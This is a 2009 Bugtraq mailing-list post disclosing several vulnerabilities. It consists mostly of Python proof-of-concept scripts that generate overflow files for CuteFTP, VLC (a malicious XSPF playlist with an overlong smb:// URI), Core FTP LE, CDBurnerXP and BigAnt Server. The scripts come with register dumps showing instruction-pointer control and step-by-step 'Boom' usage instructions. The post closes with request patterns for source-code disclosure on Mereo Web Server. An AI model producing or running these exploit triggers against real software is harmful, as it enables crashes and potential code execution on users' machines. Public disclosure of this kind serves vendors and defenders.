[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Multiple Vulnerabilities
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Multiple Vulnerabilities
- From: "Dr_IDE" <dr_ide@xxxxxxxxxxxx>
- Date: Fri, 25 Sep 2009 13:24:18 -0400
Usually I submit via milw0rm but it has been unresponsive all week.
Here are a few new vulnerabilities and updates.
-Dr_IDE
#!/usr/bin/env python
#####################################################################################################
#
# CuteFTP v8.3.3 Home/Pro/Lite Create New Site Local Buffer Overflow PoC
# Found By: Dr_IDE
# Download: http://www.cuteftp.com/downloads/
# Tested On: Windows 7 RC, XP might be more shell friendly
# Notes: This PoC exploits the "Create New Site" mechanism. Any site
type that you pick will work.
# Because of differences in the internal process of each site
type you may be able to get
# execution through one of these channels.
#
#####################################################################################################
"""
EAX 02120000
ECX 0228BA90 ASCII
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 41414141
EBX 00004141
ESP 0018C160
EBP 0018C230
ESI 0228BA88
EDI 41414141
EIP 77843913 ntdll.77843913
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 1 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty -??? FFFF 000000FF 00FF00FF
ST1 empty -??? FFFF 00000000 00008200
ST2 empty -??? FFFF 00010000 00010000
ST3 empty 431.99999034404754640
ST4 empty 1.0000000000000000000
ST5 empty 1.0000000000000000000
ST6 empty 16.000000000000000000
ST7 empty 16.000000000000000000
3 2 1 0 E S P U O Z D I
FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
"""
buff = ("\x41" * 20000)
try:
f1 = open("CuteFTP.txt","w");
f1.write(buff);
f1.close();
print "\nCuteFTP v8.3.2 Home/Pro/Lite Create New Site Local Buffer
Overflow PoC"
print "By: Dr_IDE"
print "\nFile Created Successfully.\n"
print "Usage:\n [-] Click File\n [-] Create New FTP Site\n [-] Paste
String into Label Field\n [-] Enter anything for Address\n [-] Click Connect\n
[-] Boom."
except:
print "[-] Error. File couldn't be created."
##########################################################################################################
#
# VLC Media Player 1.0.2 smb:// URI Handling Remote Stack Overflow PoC
# Found By: Dr_IDE
# Tested: Windows XP SP2 , XP SP3 and Windows 7 RC1 with VLC 1.0.2
"Goldeneye"
# Download:
http://majorgeeks.com/downloadget.php?id=4674&file=1&evp=a87d1b50269ba27878899d30ec7cd947
#
##########################################################################################################
# XPSP3 Crash
"""
EAX FFFFFFFE
ECX 42424242 <--------- w00t!
EDX 00000000
EBX 42424242
ESP 02EAF694
EBP 02EAF7C4
ESI 61CC8324 libacc_4.61CC8324
EDI 61CC8323 libacc_4.61CC8323
EIP 77C478AC msvcrt.77C478AC
C 0 ES 0023 32bit 0(FFFFFFFF)
P 0 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFAC000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_MOD_NOT_FOUND (0000007E)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty -UNORM FB18 0184A1C0 00AD4518
ST1 empty +UNORM 2088 00000000 00000000
ST2 empty 0.3987488760738806780e-4933
ST3 empty -??? FFFF 00000000 77C2C42E
ST4 empty +UNORM 0B10 00B094E8 00000000
ST5 empty 0.3987486256431287370e-4933
ST6 empty 0.0
ST7 empty -0.2650710894356302916
3 2 1 0 E S P U O Z D I
FST 0020 Cond 0 0 0 0 Err 0 0 1 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
"""
header1 = ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n")
header1 += ("<playlist version=\"1\" xmlns=\"http://xspf.org/ns/0/\"
xmlns:vlc=\"http://www.videolan.org/vlc/playlist/ns/0/\">\n")
header1 += ("\t<title>Playlist</title>\n")
header1 += ("\t<trackList>\n")
header1 += ("\t\t<track>\n")
header1 += ("\t\t\t<location>smb://example.com@xxxxxxxxxxxxxxx/foo/#{")
payload = ("\x41" * 2 + "\x42" * 4 + "\x43" * 10000)
header2 = ("}</location>\n");
header2 += ("\t\t\t<extension
application=\"http://www.videolan.org/vlc/playlist/0\">\n");
header2 += ("\t\t\t\t<vlc:id>0</vlc:id>\n");
header2 += ("\t\t\t</extension>\n");
header2 += ("\t\t</track>\n");
header2 += ("\t</trackList>\n");
header2 += ("</playlist>\n");
try:
f1 = open("vlc_1.0.2.xspf","w")
f1.write(header1 + payload + header2)
f1.close()
print("\nExploit file created!\n")
except:
print "Error"
#!/usr/bin/env python
####################################################################################
#
# Core FTP LE v2.1 build 1612 Local Buffer Overflow PoC (Unicode)
# Found By: Dr_IDE
# Tested On: XPSP3, 7RC
# Notes: Most likely other versions are vulnerable too.
# Usage: File, Quick Connect, Paste into Hostname, Connect
#
####################################################################################
# Register Dump on XPSP3
"""
EAX 00000064
ECX 00410041 coreftp.00410041
EDX 0054F840 coreftp.0054F840
EBX 026E2FFC
ESP 0321E958 UNICODE
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 00410041 coreftp.00410041
ESI 0269CC30
EDI 04BB6A58 UNICODE
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EIP 00410041 coreftp.00410041
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFD7000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr WSAHOST_NOT_FOUND (00002AF9)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 0.0
ST7 empty 0.0
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
"""
# After Passing Exception on XPSP3
# EIP 00410041 coreftp.00410041
buff = ("\x41" * 6000)
f1 = open("coreftple.txt","w")
f1.write(buff)
f1.close()
#!/usr/bin/env python
####################################################################################
#
# CDBurnerXP v 4.2.4.1351 Local Crash PoC
# Found By: Dr_IDE
# Tested On: XPSP3, 7RC
# Usage: Create New Data Disc, Add a Folder, Paste to Rename Folder,
Click Save Compilation as ISO
# Notes: Super lame and most likely not exploitable.
#
####################################################################################
'''
Error Message:
System.NullReferenceException: Object reference not set to an instance of an
object.
at CDBurnerXP.Controls.FileLayoutManager.SaveAsIso(String filename)
at CDBurnerXP_Pro.frmDataCompilation.mnuSaveISO_Click(Object sender,
EventArgs e)
at System.Windows.Forms.MenuItem.OnClick(EventArgs e)
at System.Windows.Forms.MenuItem.MenuItemData.Execute()
at System.Windows.Forms.Command.Invoke()
at System.Windows.Forms.Command.DispatchID(Int32 id)
at System.Windows.Forms.Control.WmCommand(Message& m)
at System.Windows.Forms.Control.WndProc(Message& m)
at System.Windows.Forms.ScrollableControl.WndProc(Message& m)
at System.Windows.Forms.ContainerControl.WndProc(Message& m)
at System.Windows.Forms.Form.WndProc(Message& m)
at CDBurnerXP.Forms.BaseForm.WndProc(Message& m)
at CDBurnerXP_Pro.mdiMain.WndProc(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr
wparam, IntPtr lparam)
'''
buff = ("\x41" * 5000)
f1 = open("cdburnerxp.txt","w")
f1.write(buff)
f1.close()
#!/usr/bin/env python
########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Plug-In, Add our zip, Boom.
#
########################################################################
buff = ("\x41" * 10000)
f1 = open("BigAntPlugIn.zip","w")
f1.write(buff)
f1.close()
#!/usr/bin/env python
########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Update, Add our zip, Boom.
#
########################################################################
buff = ("\x41" * 10000)
f1 = open("BigAntUpdate.zip","w")
f1.write(buff)
f1.close()
#################################################################################
#
# Mereo Web Server v1.8 Multiple Remote Source Code Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
#
#################################################################################
- Description -
Mereo Web Server v1.8 is a Windows based HTTP server. This is the latest
version of
the application available.
Mereo is vulnerable to remote arbitrary source code disclosure by the following
means.
- Technical Details -
http://[ webserver IP]/[ file ][.]
http://[ webserver IP]/[ file ][::$DATA]
http://172.16.2.101/index.html.
http://172.16.2.101/index.html::$DATA